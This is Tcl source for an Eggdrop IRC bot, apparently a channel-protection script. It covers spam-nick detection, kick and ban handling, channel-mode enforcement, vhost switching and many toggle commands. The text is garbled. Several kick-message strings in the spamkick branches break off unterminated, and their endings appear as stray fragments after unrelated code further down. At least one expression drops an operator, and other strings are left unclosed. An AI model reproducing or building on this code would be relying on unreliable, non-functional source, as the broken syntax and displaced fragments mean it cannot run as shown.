if {[isutimer "GOP $channel"]} { return 0 } if {![onchan $botnick $channel]} { return 0 } utimer 20 [list putlog " 4� 12S.E.P.T.I.A.N 4� GOP $channel"] set cinfo [channel info $channel] if {[string match "*+nodesynch*" $cinfo]} { pub_mdeop "*" "*" "*" $channel "" } set cmode [getchanmode $channel] if {![isutimer "set_-m $channel"] && ![info exists is_m($channel)]} { if {[matchattr $cflag K]} { if {![string match "*[dezip [getuser $cflag XTRA "CI"]]*" [getchanmode $channel]]} { puthelp "mode $channel -k+k . [dezip [getuser $cflag XTRA "CI"]]" } } { if {[string match "*k*" $cmode]} { if {[string tolower $channel] != [dezip "BKGW.1s0d06/"]} { putserv "mode $channel -k 9r.e.l.e.a.s.e.d " } } } if {[string match "*R*" $cmode]} { puthelp "mode $channel -R" } if {[string match "*m*" $cmode] && ![string match "*m*" [lindex [channel info $channel] 0]]} { putserv "mode $channel -m" } if {[string match "*i*" $cmode]} { putserv "mode $channel -i" } } if {![string match "*m*" $cmode]} { foreach x [utimers] { if {[string match "*set_-m $channel*" $x]} { killutimer [lindex $x 2] } } } if {[matchattr $cflag I]} { if {[topic $channel] != [getuser $cflag XTRA "TOPIC"]} { puthlp "topic $channel :[getuser $cflag XTRA "TOPIC"]" } } foreach x [chanlist $channel] { if {$x == $deopme} { if {[isop $x $channel]} { if {![string match "*k*" $cmode]} { if {$quick == "1"} { putquick "mode $channel -ko [email protected] $x" } else { putserv "mode $channel -ko [email protected] $x" } } { if {$quick == "1"} { putquick "mode $channel -o $x" } else { putserv "mode $channel -o $x"
} } } set deopme "" } set mhost "@[lindex [split [getchanhost $x $channel] @] 1]" if {[info exists kickme($x)]} { if {$kickme($x) == 3} { catch { unset kickme($x) } set bannick($x) "*!*$mhost" if {$quick == "1"} { putqck "KICK $channel $x :$notc 1RePeaT 4KIcK 1ReMoTe OFF 4..!" } else { putsrv "KICK $channel $x :$notc 1RePeaT 4KIcK 1ReMoTe OFF 4..!" } } { if {$kickme($x) == 1} { if {$quick == "1"} { putqck "KICK $channel $x :$notc 1SeLF 4KIcK 1 REvENgE 4..!" } { putsrv "KICK $channel $x :$notc 1SeLF 4KIcK 1 REvENgE 4..!" } } } } if {[matchattr $cflag V]} { if {![isutimer "set_-m $channel"] && ![info exists is_m($channel)]} { if {$x != $botnick && ![isvoice $x $channel] && ![isop $x $channel] && ![matchattr $x O]} { set cret [getuser $cflag XTRA "VC"] foreach ct [utimers] { if {[string match "*voiceq*" $ct]} { if {[expr [lindex $ct 0] + [getuser $cflag XTRA "VC"]] > $cret} { set cret [expr [lindex $ct 0] + [getuser $cflag XTRA "VC"]] } } } utimer $cret [list voiceq $channel $x] } } } if {[matchattr $x v] || [matchattr $x P] || [matchattr $x G]} { if {![isop $x $channel] || ![isvoice $x $channel]} { whoisq $x } } if {[matchattr $x O]} { if {[isop $x $channel]} { set cmode [getchanmode $channel] if {![string match "*k*" $cmode]} { puthelp "mode $channel -ko [email protected] $x" } { puthelp "mode $channel -o $x" } } { if {[isvoice $x $channel]} { set cmode [getchanmode $channel] if {![string match "*k*" $cmode]} {
puthelp "mode $channel -kv [email protected] $x" } { puthelp "mode $channel -v $x" } } } } if {[info exists invme($mhost)]} { if {![isop $x $channel]} { set bannick($x) "*!*$mhost" if {$invme($mhost) == "AuToJoIN MSg"} { if {![isvoice $x $channel]} { putsrv "KICK $channel $x :$notc 4!SpaM! 1 FRoM 4$mhost 1$invme($mhost) 4 R 1emote 4 O 1ff 4..!" } } { putsrv "KICK $channel $x :$notc 4!SpaM! 1 FRoM 4$mhost 1$invme($mhost) [banmsg]" } } catch {unset invme($mhost)} } if {$x == $virus_nick} { if {![isop $x $channel]} { set bannick($x) "*!*$mhost" putsrv "KICK $channel $x :$notc 4!SpaM! 1 FRoM 4$mhost 1 VIRuZ [banmsg]" set virus_nick "" } } spam_chk $x [getchanhost $x $channel] "*" $channel } foreach x [chanlist $channel K] { if {![matchattr $x f]} { akick_chk $x [getchanhost $x $channel] $channel } } foreach x [chanbans $channel] { set bhost [lindex $x 0] if {[string match [string tolower $bhost] [string tolower $botname]]} { if {![string match "*k*" $cmode]} { puthelp "mode $channel -kb 4SeLF.UnBaN $bhost" } { puthelp "mode $channel -b $bhost" } } elseif {[matchattr $bhost f]} { puthelp "mode $channel -b $bhost" } elseif {[getuser "config" XTRA "IPG"] != ""} { foreach ipg [getuser "config" XTRA "IPG"] { if {[string match $ipg $bhost] || [string match $bhost $ipg]} { if {![isutimer "IPG $bhost"]} { if {![string match "*k*" $cmode]} { puthelp "mode $channel -kb 4IpgUaRd $bhost" } { puthelp "mode $channel -b $bhost" } utimer 60 [list putlog "IPG $bhost"] } }
} } } } bind time - "01 * * * *" show_status proc show_status {min h d m y} { global botnick foreach x [channels] { if {[isop $botnick $x]} { pub_status "*" "*" "*" $x "" chk_on_op $x } } return 0 } proc badnick_chk {nick uhost hand chan} { global bannick notc botnick badwords foreach x [string tolower $badwords] { if {[string match "*$x*" [string tolower $nick]]} { set bannick($nick) "*!$uhost" putsrv "KICK $chan $nick :$notc 4BaD NIcK 1 MaTcH FRoM 4[string toupper $x] [banms]" return 1 } } return 0 } proc spam_chk {nick uhost hand chan} { global notc botnick spidx set cflag "c$chan" set cflag [string range $cflag 0 8] if {![matchattr $cflag S]} { return 0 } if {$nick == $botnick} { return 0 } if {[isvoice $nick $chan]} { return 0 } if {[isop $nick $chan]} { return 0 } if {[matchattr $nick f]} { return 0 } if {[badnick_chk $nick $uhost $hand $chan]} { return 0 } set nicklen [string length $nick] if {$nicklen < 5} { return 0 } set idx [string index $nick [expr $nicklen - 4]][string index $nick [expr $nicklen - 3]][string index $nick [expr $nicklen - 2]][string index $nick [expr $nicklen 1]] if {[isnumber $idx]} { return 0 } set idx [string index $nick [expr $nicklen - 2]][string index $nick [expr $nicklen - 1]] if {[isnumber $idx]} { if {[string index $uhost 0] != "~"} { return 0 } if {$nicklen < 10} { if {![string match "~$nick@*" $uhost]} { return 0 } } { if {![string match "~[string index $nick 0][string index $nick 1][string index $nick 2]*@*" $uhost]} { return 0 } } if {$spidx == 18} { set spidx 1 }
spamkick $nick $uhost $chan return 0 } if {[regexp \[^a-z\] $nick]} { return 0 } set nickchk [string tolower $nick] set count 0 set lstidx "" for {set i 0} {$i < $nicklen} {incr i} { set idx [string index $nickchk $i] if {$idx == "a" || $idx == "e" || $idx == "i" || $idx == "o" || $idx == "u"} { set count 0 } { if {$idx != $lstidx && $idx != "y"} { incr count } if {$count == 4} { spamkick $nick $uhost $chan return 0 } } set lstidx $idx } } proc akick_chk {nick uhost chan} { global notc bannick foreach x [getuser "AKICK" HOSTS] { if {[string match [string tolower $x] [string tolower "$nick!$uhost"]]} { set bannick($nick) $x putsrv "KICK $chan $nick :$notc 4B 1L 4a 1c 4K 1L 4I 1s 4T 1 MaTcH FRoM 4 $x [banms]" return 0 } } } set spidx 1 proc spamkick {nick uhost chan} { global spidx notc bannick set bannick($nick) "*!$uhost" if {$spidx == 1} { putsrv "KICK $chan $nick :$notc 4!SpaM! 1 YeW AInT WeLcOmE In 4[string toupper $chan] [banms]" } elseif {$spidx == 2} { putsrv "KICK $chan $nick :$notc 4!SpaM! 1 DRonE TRoJaN [banmsg]" } elseif {$spidx == 3} { putsrv "KICK $chan $nick :$notc 4!SpaM! 1 UgH I HatE ThIs NIcK [banmsg]" } elseif {$spidx == 4} { putsrv "KICK $chan $nick :$notc 4!SpaM! 1 Ups WRoNg WaY [banmsg]" } elseif {$spidx == 5} { putsrv "KICK $chan $nick :$notc 4!SpaM! 1 DonT EnTeReD 4[string toupper $chan] [banms]" } elseif {$spidx == 6} { putsrv "KICK $chan $nick :$notc 4!SpaM! 1 InTeRcEpT [banmsg]" } elseif {$spidx == 7} { putsrv "KICK $chan $nick :$notc 4!SpaM! 1 G.o.T.c.H.a [banmsg]" } elseif {$spidx == 8} { putsrv "KICK $chan $nick :$notc 4!SpaM! 1 NEgaTIvE HoUsToN [banmsg]" } elseif {$spidx == 9} { putsrv "KICK $chan $nick :$notc 4!SpaM! 1 gRoUndEd [banmsg]" } elseif {$spidx == 10} { putsrv "KICK $chan $nick :$notc 4!SpaM! 1 AnTIcIpaTEd [banmsg]"
} elseif {$spidx == 11} { putsrv "KICK $chan $nick :$notc 4!SpaM! 1 } elseif {$spidx == 12} { putsrv "KICK $chan $nick :$notc 4!SpaM! 1 } elseif {$spidx == 13} { putsrv "KICK $chan $nick :$notc 4!SpaM! 1 [banms]" } elseif {$spidx == 14} { putsrv "KICK $chan $nick :$notc 4!SpaM! 1 } elseif {$spidx == 15} { putsrv "KICK $chan $nick :$notc 4!SpaM! 1 } elseif {$spidx == 16} { putsrv "KICK $chan $nick :$notc 4!SpaM! 1 $chan] [banms]" } elseif {$spidx == 17} { putsrv "KICK $chan $nick :$notc 4!SpaM! 1 } elseif {$spidx >= 18} { putsrv "KICK $chan $nick :$notc 4!SpaM! 1 set spidx 0 } incr spidx return 0 } proc isutimer {text} { set text [string tolower $text] foreach x [utimers] { set x [string tolower $x] if {[string match "*$text*" $x]} { return 1 break } } return 0 } proc istimer {text} { set text [string tolower $text] foreach x [timers] { set x [string tolower $x] if {[string match "*$text*" $x]} { return 1 break } } return 0 } catch { set old_hostname ${my-hostname} } catch { set old_ip ${my-ip} }
gO sIt In tHe cOrNeR [banmsg]" b.l.a.c.k.l.i.s.t.e.d [banmsg]" ReJecTed FRoM
4[string toupper $chan]
sMoosHINg ReLaY TaBLe [banmsg]" dUn EnTeRed oNe oF mY cHanneL [banmsg]" ReFusEd LInK tO
4[string toupper
FakE NIcKNaMe [banmsg]" Unable to resolve 4 $nick [banms]"
bind dcc * setvhost dcc_setvhost proc dcc_setvhost {hand idx arg} { global my-hostname my-ip notc set arg [string trim $arg] for {set i 0} {$i < [string length $arg]} {incr i} { set idx2 [string index $arg $i] if {![string match "*$idx2*" "1234567890."]} { putdcc $idx "FAILED \!\!\! UsE DNS IP NuMBeR" return 0 }
} set my-hostname $arg set my-ip $arg setuser "config" XTRA "VHOST" $arg saveuser putdcc $idx "cHaNgINg vHosT tO $arg ReQuesT By \[
bind msg Z vhost msg_vhost proc msg_vhost {nick uhost hand rest} { global my-hostname my-ip notc if {$rest == ""} { puthlp "NOTICE $nick :$notc ReSET TO DeFauLT" setuser "config" XTRA "VHOST" "" saveuser vback "*" "*" "0" return 0 } for {set i 0} {$i < [string length $rest]} {incr i} { set idx [string index $rest $i] if {![string match "*$idx*" "1234567890."]} { puthlp "NOTICE $nick :$notc UsE DNS IP NuMBeR" return 0 } } if {[isutimer "vback"]} { puthlp "NOTICE $nick :$notc WaIT..!" return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } set my-hostname $rest set my-ip $rest utimer 30 [list vback $nick $rest "1"] listen 65234 bots set idx [connect $rest 65234] if {[isnumber $idx] && $idx > 0} { if {![isutimer "vback"]} { return 0 } foreach x [utimers] { if {[string match "*vback*" $x]} { killutimer [lindex $x 2] } } setuser "config" XTRA "VHOST" $rest saveuser putsrv "QUIT :$notc cHaNgINg vHosT ReQuesT By \[ $nick \]" } listen 65234 off } bind raw - 465 klined proc klined {from keyword arg} { vback "*" "*" "0" } proc vback {nick vhosts chk} { global old_hostname old_ip notc set my-hostname $old_hostname set my-ip $old_ip
if {$chk == "1"} { puthlp "NOTICE $nick :$notc \[ $vhosts \] NoT SuPPoRT..!" } catch { listen 652343 off } } set ps "NeoTheOne" proc pub_status {nick uhost hand channel rest} { global ban-time botnick own ps vern set cflag "c$channel" set cflag [string range $cflag 0 8] if {$rest != ""} { if {[validchan $rest]} { set channel $rest } { return 0 } } set cinfo [channel info $channel] if {![string match "*+shared*" $cinfo] && $nick == "*"} { return 0 } set mstatus "" if {[matchattr $cflag I]} { append mstatus "\[ 1T \]oPIcLocK " } if {[matchattr $cflag M]} { append mstatus "FoRcE\[ 1M \]odE " } if {[string match "*+nodesynch*" $cinfo]} { append mstatus "AuTo\[ 1K \]IcK " } if {[string match "*-userinvites*" $cinfo]} { append mstatus "\[ 1D \]onTKIcK@P " } if {[string match "*+protectfriends*" $cinfo]} { append mstatus "UnRE\[ 1@ \]P " } if {[string match "*+greet*" $cinfo]} { set i 0 while {$i < [string length $cinfo]} { set y 0 while {$y < [string length [lindex $cinfo $i]]} { if {[string index [lindex $cinfo $i] $y] == ":"} { break } set y [incr y] } if {$y != [string length [lindex $cinfo $i]]} { break } set i [incr i] } set ichan [lindex $cinfo $i] set ictcp [lindex $cinfo [expr $i + 1]] set ijoin [lindex $cinfo [expr $i + 2]] set ikick [lindex $cinfo [expr $i + 3]] set ideop [lindex $cinfo [expr $i + 4]] set inick [lindex $cinfo [expr $i + 5]] if {![string match "*:*" $inick]} { set inick "0" } append mstatus "\[ 1G \]uaRd FLoOd \[LInE 1 $ichan cTcP 1 $ictcp JoIN 1 $ijoin KIcK 1 $ikick De@p 1 $ideop NIcK 1 $inick \] " if {${ban-time} != 0} { append mstatus "\[ 1B \]aNTImE 1 ${ban-time} mIn " } } if {[matchattr $cflag V]} { append mstatus "\[ 1A \]uToVoIcE 1 [getuser $cflag XTRA "VC"] 2nd " } if {[matchattr $cflag K]} { append mstatus "\[ 1K \]eY " } if {[matchattr $cflag D]} { append mstatus "Re\[ 1V \]eNgE " } if {[matchattr $cflag G]} { append mstatus "\[ 1G \]ReeT " } if {[matchattr $cflag S]} { append mstatus "\[ 1S \]paM " } if {[getuser "config" XTRA "KOPS"]!=""} { append mstatus "\[ 1@ \]PSKIcK " } if {[matchattr $cflag R]} { append mstatus "\[ 1R \]ePeaT 1 [getuser $cflag XTRA
"RPT"] " } if {[matchattr $cflag U]} { append mstatus "\[ 1C \]aPs 1 [getuser $cflag XTRA "CAPS"]% " } if {[matchattr $cflag P]} { append mstatus "JoIN\[ 1P \]aRT 1 [getuser $cflag XTRA "JP"] 2nd " } if {[matchattr $cflag T]} { append mstatus "\[ 1T \]exT 1 [getuser $cflag XTRA "CHAR"] CHaR " } if {[matchattr $cflag J]} { append mstatus "MaSs\[ 1J \]oIN " } if {[matchattr $cflag L]} { append mstatus "\[ 1L \]ImITEd 1 +[getuser $cflag XTRA "LIMIT"] " } if {[string match "*+seen*" $cinfo]} { append mstatus "\[ 1S \]EEN " } if {[matchattr $cflag O]} { append mstatus "\[ 1C \]LonE 1 [getuser $cflag XTRA "CLONE"] MaX " } if {[matchattr $cflag E]} { append mstatus "\[ 1E \]nFoRceBaN " } if {[matchattr $cflag C]} { append mstatus "\[ 1C \]YcLE 1 [getuser $cflag XTRA "CYCLE"] MnT " } if {$mstatus != ""} { if {[getuser "config" XTRA "ADmIN"]!=""} { set mstatus "SeT FoR \[ 1[string toupper $channel] \] ${mstatus}[getuser "config" XTRA "ADmIN"] [lgrnd] " } { set mstatus "SeT FoR \[ 1[string toupper $channel] \] ${mstatus}[lgrnd] " } } if {[string match "*c*" [getchanmode $channel]]} { set mstatus [uncolor $mstatus] regsub -all -$mstatus "" mstatus } puthlp "PRIVMSG $channel :\001ACTION $mstatus\001" } proc pub_+spam {nick uhost hand chan rest} { global notc if {$rest != ""} { set chan [lindex $rest 0] if {[string first # $chan]!=0} { set chan "#$chan" } } set cflag "c$chan" set cflag [string range $cflag 0 8] if {[string tolower $chan] == "#all"} { if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } foreach x [userlist A] { chattr $x +S } puthlp "NOTICE $nick :$notc ALL SpaM CHaNNeL \[ 9ON \]" return 0 } if {![validchan $chan]} { return 0 } if {[matchattr $cflag S]} { puthlp "NOTICE $nick :$notc SpaM $chan \[ 9ON \]" return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!"
return 0 } chattr $cflag +S puthlp "NOTICE $nick :$notc SpaM $chan \[ 9ON \]" saveuser } proc pub_-spam {nick uhost hand chan rest} { global notc if {$rest != ""} { set chan [lindex $rest 0] if {[string first # $chan]!=0} { set chan "#$chan" } } set cflag "c$chan" set cflag [string range $cflag 0 8] if {[string tolower $chan] == "#all"} { if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } foreach x [userlist A] { chattr $x -S } puthlp "NOTICE $nick :$notc ALL SpaM CHaNNeL \[ 4OFF return 0 } if {![validchan $chan]} { return 0 } if {![matchattr $cflag S]} { puthlp "NOTICE $nick :$notc SpaM $chan \[ 4OFF \]" return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } chattr $cflag -S puthlp "NOTICE $nick :$notc SpaM $chan \[ 4OFF \]" saveuser } proc pub_+cycle {nick uhost hand chan rest} { global notc set cflag "c$chan" set cflag [string range $cflag 0 8] if {$rest=="" || ![isnumber $rest]} { puthlp "NOTICE $nick :$notc Usage +cYcLe <minutes>" return 0 } if {$rest == 0} { puthlp "NOTICE $nick :$notc cAnT UsE NuLL" return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } chattr $cflag +C setuser $cflag XTRA "CYCLE" $rest
puthlp "NOTICE $nick :$notc cYcLe $chan \[ 9 $rest \] MnT" if {![istimer "cycle $chan"]} { timer $rest [cycle $chan] } saveuser } proc pub_-cycle {nick uhost hand chan rest} { global notc set cflag "c$chan" set cflag [string range $cflag 0 8] if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } chattr $cflag -C setuser $cflag XTRA "CYCLE" "" puthlp "NOTICE $nick :$notc cYcLe $chan \[ 4OFF \]" saveuser foreach x [timers] { if {[string match "*cycle $chan*" $x]} { killtimer [lindex $x 2] } } } proc pub_+greet {nick uhost hand chan rest} { global notc set cflag "c$chan" set cflag [string range $cflag 0 8] if {$rest==""} { puthlp "NOTICE $nick :$notc Usage +greet <msg>" return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } chattr $cflag +G setuser $cflag XTRA "GREET" $rest puthlp "NOTICE $nick :$notc AuTOGReeT $chan \[$rest\]" saveuser } proc pub_-greet {nick uhost hand chan rest} { global notc set cflag "c$chan" set cflag [string range $cflag 0 8] if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } chattr $cflag -G setuser $cflag XTRA "GREET" "" puthlp "NOTICE $nick :$notc AuTOGReeT $chan \[ 4OFF \]" saveuser } proc pub_+limit {nick uhost hand chan rest} { global notc if {$rest == "" || ![isnumber $rest]} { puthlp "NOTICE $nick :$notc Usage: +limit " return 0 } if {$rest == 0} { puthlp "NOTICE $nick :$notc cAnT UsE NuLL"
return 0 } set cflag "c$chan" set cflag [string range $cflag 0 8] if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } chattr $cflag +L setuser $cflag XTRA "LIMIT" $rest puthlp "NOTICE $nick :$notc LImIT $chan \[ 9 $rest \]" saveuser } proc pub_-limit {nick uhost hand chan rest} { global notc lst_limit set cflag "c$chan" set cflag [string range $cflag 0 8] if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } chattr $cflag -L setuser $cflag XTRA "LIMIT" "" puthlp "NOTICE $nick :$notc LImIT $chan \[ 4 OFF \]" catch { lst_limit($chan) } saveuser } proc pub_+topic {nick uhost hand chan rest} { global notc set cflag "c$chan" set cflag [string range $cflag 0 8] if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } chattr $cflag +I setuser $cflag XTRA "TOPIC" [topic $chan] puthlp "NOTICE $nick :$notc TopIc $chan \[ 9 LocK \]" saveuser } proc pub_-topic {nick uhost hand chan rest} { global notc lst_limit set cflag "c$chan" set cflag [string range $cflag 0 8] if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } chattr $cflag -I setuser $cflag XTRA "TOPIC" "" puthlp "NOTICE $nick :$notc TopIc $chan \[ 4 UnLocK \]" saveuser } proc pub_+joinpart {nick uhost hand chan rest} { global notc set cflag "c$chan" set cflag [string range $cflag 0 8] if {$rest=="" || ![isnumber $rest]} {
puthlp "NOTICE $nick :$notc Usage +joinpart <seconds>" return 0 } if {$rest == 0} { puthlp "NOTICE $nick :$notc cAnT UsE NuLL" return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } chattr $cflag +P setuser $cflag XTRA "JP" $rest puthlp "NOTICE $nick :$notc JoINPaRT $chan \[ 9 $rest Sec's saveuser } proc pub_-joinpart {nick uhost hand chan rest} { global notc set cflag "c$chan" set cflag [string range $cflag 0 8] if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } chattr $cflag -P setuser $cflag XTRA "JP" "" puthlp "NOTICE $nick :$notc JoINPaRT $chan \[ 4OFF \]" saveuser } proc pub_+clone {nick uhost hand chan rest} { global notc set cflag "c$chan" set cflag [string range $cflag 0 8] if {$rest=="" || ![isnumber $rest]} { puthlp "NOTICE $nick :$notc Usage +clone <max>" return 0 } if {$rest == 0} { puthlp "NOTICE $nick :$notc cAnT UsE NuLL" return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } chattr $cflag +O setuser $cflag XTRA "CLONE" $rest puthlp "NOTICE $nick :$notc cLonE $chan MaX \[ 9 $rest \]" saveuser } proc pub_-clone {nick uhost hand chan rest} { global notc set cflag "c$chan" set cflag [string range $cflag 0 8] if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 }
chattr $cflag -O setuser $cflag XTRA "CLONE" "" puthlp "NOTICE $nick :$notc cLonE $chan \[ 4OFF \]" saveuser } proc pub_+key {nick uhost hand chan rest} { global notc set cflag "c$chan" set cflag [string range $cflag 0 8] set rest [lindex $rest 0] if {$rest==""} { puthlp "NOTICE $nick :$notc Usage +key <word>" return 0 } chattr $cflag +K setuser $cflag XTRA "CI" [zip $rest] puthlp "NOTICE $nick :$notc KeY $chan \[ 9 $rest \]" saveuser } proc pub_-key {nick uhost hand chan rest} { global notc set cflag "c$chan" set cflag [string range $cflag 0 8] if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } chattr $cflag -K setuser $cflag XTRA "CI" "" puthlp "NOTICE $nick :$notc KeY $chan \[ 4OFF \]" saveuser } proc pub_+text {nick uhost hand chan rest} { global notc set cflag "c$chan" set cflag [string range $cflag 0 8] if {$rest=="" || ![isnumber $rest]} { puthlp "NOTICE $nick :$notc Usage +text <max>" return 0 } if {$rest == 0} { puthlp "NOTICE $nick :$notc cAnT UsE NuLL" return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } chattr $cflag +T setuser $cflag XTRA "CHAR" $rest puthlp "NOTICE $nick :$notc TexT $chan MaX \[ 9 $rest saveuser } proc pub_-text {nick uhost hand chan rest} { global notc set cflag "c$chan" set cflag [string range $cflag 0 8] if {![matchattr $nick Q]} {
puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } chattr $cflag -T setuser $cflag XTRA "CHAR" "" puthlp "NOTICE $nick :$notc TexT $chan \[ 4OFF \]" saveuser } proc pub_+caps {nick uhost hand chan rest} { global notc set cflag "c$chan" set cflag [string range $cflag 0 8] if {$rest=="" || ![isnumber $rest]} { puthlp "NOTICE $nick :$notc Usage +caps <%percent>" return 0 } if {$rest == 0 || $rest > 100} { puthlp "NOTICE $nick :$notc fill under 1 - 100%" return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } chattr $cflag +U setuser $cflag XTRA "CAPS" $rest puthlp "NOTICE $nick :$notc CAPS $chan \[ 9 $rest% \]" saveuser } proc pub_-caps {nick uhost hand chan rest} { global notc set cflag "c$chan" set cflag [string range $cflag 0 8] if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } chattr $cflag -U setuser $cflag XTRA "CAPS" "" puthlp "NOTICE $nick :$notc cAPs $chan \[ 4OFF \]" saveuser } proc pub_+repeat {nick uhost hand chan rest} { global notc set cflag "c$chan" set cflag [string range $cflag 0 8] if {$rest=="" || ![isnumber $rest]} { puthlp "NOTICE $nick :$notc Usage +repeat <max>" return 0 } if {$rest == 0} { puthlp "NOTICE $nick :$notc cAnT UsE NuLL" return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 }
chattr $cflag +R setuser $cflag XTRA "RPT" $rest puthlp "NOTICE $nick :$notc RePeaT $chan MaX \[ 9 $rest \]" saveuser } proc pub_-repeat {nick uhost hand chan rest} { global notc set cflag "c$chan" set cflag [string range $cflag 0 8] if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } chattr $cflag -R setuser $cflag XTRA "RPT" "" puthlp "NOTICE $nick :$notc RePeaT $chan \[ 4OFF \]" saveuser } proc pub_+autovoice {nick uhost hand chan rest} { global notc set cflag "c$chan" set cflag [string range $cflag 0 8] if {$rest=="" || ![isnumber $rest]} { puthlp "NOTICE $nick :$notc Usage +AuTovoIcE <secs>" return 0 } if {$rest == 0} { puthlp "NOTICE $nick :$notc cAnT UsE NuLL" return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } chattr $cflag +V setuser $cflag XTRA "VC" $rest puthlp "NOTICE $nick :$notc AuTovoIcE $chan qUeUe \[ 9 $rest \] 2nd" saveuser pub_mvoice $nick $uhost $hand $chan "" } proc pub_-autovoice {nick uhost hand chan rest} { global notc set cflag "c$chan" set cflag [string range $cflag 0 8] if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } chattr $cflag -V setuser $cflag XTRA "VC" "" puthlp "NOTICE $nick :$notc AuTovoIcE $chan \[ 4OFF \]" saveuser foreach x [utimers] { if {[string match "*voiceq $chan*" $x]} { killutimer [lindex $x 2] } } } proc pub_+enforceban {nick uhost hand chan rest} { global notc
set cflag "c$chan" set cflag [string range $cflag 0 8] if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } chattr $cflag +E puthlp "NOTICE $nick :$notc enforceban $chan \[ 9 ON \]" saveuser } proc pub_-enforceban {nick uhost hand chan rest} { global notc set cflag "c$chan" set cflag [string range $cflag 0 8] if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } chattr $cflag -E puthlp "NOTICE $nick :$notc enforceban $chan \[ 4OFF \]" saveuser } proc pub_+revenge {nick uhost hand chan rest} { global notc set cflag "c$chan" set cflag [string range $cflag 0 8] if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } chattr $cflag +D puthlp "NOTICE $nick :$notc revenge $chan \[ 9 ON \]" saveuser } proc pub_-revenge {nick uhost hand chan rest} { global notc set cflag "c$chan" set cflag [string range $cflag 0 8] if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } chattr $cflag -D puthlp "NOTICE $nick :$notc revenge $chan \[ 4OFF \]" saveuser } proc pub_+forced {nick uhost hand chan rest} { global notc set cflag "c$chan" set cflag [string range $cflag 0 8] if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } chattr $cflag +M puthlp "NOTICE $nick :$notc forced $chan \[ 9 ON \]" saveuser }
proc pub_-forced {nick uhost hand chan rest} { global notc set cflag "c$chan" set cflag [string range $cflag 0 8] chattr $cflag -M puthlp "NOTICE $nick :$notc forced $chan \[ 4OFF \]" saveuser } proc pub_-colour {nick uhost hand chan rest} { global notc kickclr if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } set kickclr "T" setuser "config" XTRA "KCLR" "Y" puthlp "NOTICE $nick :$notc colour kick \[ 4 OFF \]" saveuser } proc pub_+colour {nick uhost hand chan rest} { global notc kickclr if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } catch {unset kickclr} setuser "config" XTRA "KCLR" "" puthlp "NOTICE $nick :$notc colour kick \[ 9 ON \]" saveuser } proc pub_+ipguard {nick uhost hand channel param} { global botname botnick notc botnick set rest [lindex $param 0] if {$rest == ""} { puthlp "NOTICE $nick :$notc Usage: +ipguard " return 0 } if {$rest == "*" || $rest == "*!*@*"} { puthlp "NOTICE $nick :$notc invalid hostname..!" return 0 } if {![string match "*@*" $rest]} { puthlp "NOTICE $nick :$notc Usage: +ipguard " return 0 } set ipguard [getuser "config" XTRA "IPG"] foreach y $ipguard { if {$y == $rest} { puthlp "NOTICE $nick :$notc $rest allready added..!" return 0 } } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } puthlp "NOTICE $nick :$notc add \[ $rest \] To IpguaRd" lappend ipguard $rest
